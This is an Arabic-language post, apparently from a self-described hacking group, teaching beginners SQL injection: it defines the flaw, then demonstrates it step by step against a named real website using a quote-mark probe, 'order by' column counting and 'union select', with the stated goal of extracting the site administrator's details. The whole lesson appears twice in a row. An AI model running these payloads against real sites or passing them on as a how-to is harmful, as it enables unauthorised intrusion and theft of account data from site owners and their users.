بسم الله الرحمن الرحيم
قال الامام علي علية السلام
اني ذقت الطيبات كلها فلم أجد أطيب من العافية. واني ذقت المرارات كلها فلم أجد أمر
من الحاجة الى الناس .واني حملت الصخر والحديد فلم أجد أثقل من الدَين .
واعلم إن الدهر يومان يوم لك ويوم عليك فان كان لك فلا
تبطر . وان كان عليك فلا تقهر فكلاهما سينحر .
اهلا شبابنا الاعزاء درسنا اليوم هو مدخل لحتراف ثغرات sql
تعريف بسيط
ثغرة sql injection :هي خطأ برمجي يقع به مبرمج السكربت وهي عدم فلترة المدخلات للدوال شوف مثال بسيط
index.php?id=1
شوف معي اخي الكريم
المتغير id او اي متغير مثلا a
index.php?a=1
لما نحاول نعمل اختبار راح نظع علامة (') فيصبح الاستغلال هكذا
index.php?id=1'
عندما تضع ' نهاية المتغير id=1 راح تنظر الى الموقع وتلاحظ بعض الامور التالية :
1.اذا حدث تغير بالصفحة فأعلم ان الموقع مصاب وهذا النوع يندر الان بعد الفلترة من قبل المبرمجين
2.لم يحدث تغير مرات التغير يحصل في السورس المصدري للصفحة وهذا فقط للمحترفين طبعا
ناخذ موقعين نختبر عليهم الخطوات اعلاه
هذا موقع راح نحاول نستغل ثغرة sql علية
http://www.ac-psych.org/index.php?id=1
طبعا المتغير index?id=1
راح انضيف علامة '
فيصبح الاستغلال هكذا index.php?id=1'
http://www.ac-psych.org/index.php?id=1'
سوف تظهر صفحة بيظاء بعد ما ضفنا علامة التنصيص ' وهذ يدل على وجود خطأ وهو تغير الصفحة والتغير هو عدم ضهور الكتابة فية
من هنا وضعنا قدمنا على اول الطريق راح نكمل
الان نحاول معرفة العمود المصاب لكي نستطيع اظهار معلومات المدير للموقع
شوف معي لاظهار الاعمدة المصابة
نستخدم هذه الدالة
+order+by+1
شوف اخي
http://www.ac-psych.org/index.php?id=1+order+by+1
وجرب اتغير 1 الى غير رقم لحتى تزول الاخطاء بالصفحة
شوف لما ضفت 1 رجعت الصفحة بدون خطأ
جربت رقم
http://www.ac-psych.org/index.php?id=1+order+by+2
ظهر خطأ من هنا يتبين لنا ان العمود 1 هو العمود المصاب
طيب الان ننتقل الى دالة الاستغلال
وهي union+select
تضاف الى الموقع هكذا
http://www.ac-psych.org/index.php?id=1+union+select+1
ظهر رقم 1 الصفحة
طيب هذا الموضوع هو مقدمة اتمنى ان يكون الشرح واضح جدا
مع خالص التحيات
قال الامام علي علية السلام
اني ذقت الطيبات كلها فلم أجد أطيب من العافية. واني ذقت المرارات كلها فلم أجد أمر
من الحاجة الى الناس .واني حملت الصخر والحديد فلم أجد أثقل من الدَين .
واعلم إن الدهر يومان يوم لك ويوم عليك فان كان لك فلا
تبطر . وان كان عليك فلا تقهر فكلاهما سينحر .
اهلا شبابنا الاعزاء درسنا اليوم هو مدخل لحتراف ثغرات sql
تعريف بسيط
ثغرة sql injection :هي خطأ برمجي يقع به مبرمج السكربت وهي عدم فلترة المدخلات للدوال شوف مثال بسيط
index.php?id=1
شوف معي اخي الكريم
المتغير id او اي متغير مثلا a
index.php?a=1
لما نحاول نعمل اختبار راح نظع علامة (') فيصبح الاستغلال هكذا
index.php?id=1'
عندما تضع ' نهاية المتغير id=1 راح تنظر الى الموقع وتلاحظ بعض الامور التالية :
1.اذا حدث تغير بالصفحة فأعلم ان الموقع مصاب وهذا النوع يندر الان بعد الفلترة من قبل المبرمجين
2.لم يحدث تغير مرات التغير يحصل في السورس المصدري للصفحة وهذا فقط للمحترفين طبعا
ناخذ موقعين نختبر عليهم الخطوات اعلاه
هذا موقع راح نحاول نستغل ثغرة sql علية
http://www.ac-psych.org/index.php?id=1
طبعا المتغير index?id=1
راح انضيف علامة '
فيصبح الاستغلال هكذا index.php?id=1'
http://www.ac-psych.org/index.php?id=1'
سوف تظهر صفحة بيظاء بعد ما ضفنا علامة التنصيص ' وهذ يدل على وجود خطأ وهو تغير الصفحة والتغير هو عدم ضهور الكتابة فية
من هنا وضعنا قدمنا على اول الطريق راح نكمل
الان نحاول معرفة العمود المصاب لكي نستطيع اظهار معلومات المدير للموقع
شوف معي لاظهار الاعمدة المصابة
نستخدم هذه الدالة
+order+by+1
شوف اخي
http://www.ac-psych.org/index.php?id=1+order+by+1
وجرب اتغير 1 الى غير رقم لحتى تزول الاخطاء بالصفحة
شوف لما ضفت 1 رجعت الصفحة بدون خطأ
جربت رقم
http://www.ac-psych.org/index.php?id=1+order+by+2
ظهر خطأ من هنا يتبين لنا ان العمود 1 هو العمود المصاب
طيب الان ننتقل الى دالة الاستغلال
وهي union+select
تضاف الى الموقع هكذا
http://www.ac-psych.org/index.php?id=1+union+select+1
ظهر رقم 1 الصفحة
طيب هذا الموضوع هو مقدمة اتمنى ان يكون الشرح واضح جدا
مع خالص التحيات| روابط هذه التدوينة قابلة للنسخ واللصق | |
| URL | |
| HTML | |
| BBCode | |
شاهد ايضا اخر مواضيع الجيش العرقي الالكتروني
kamindoz
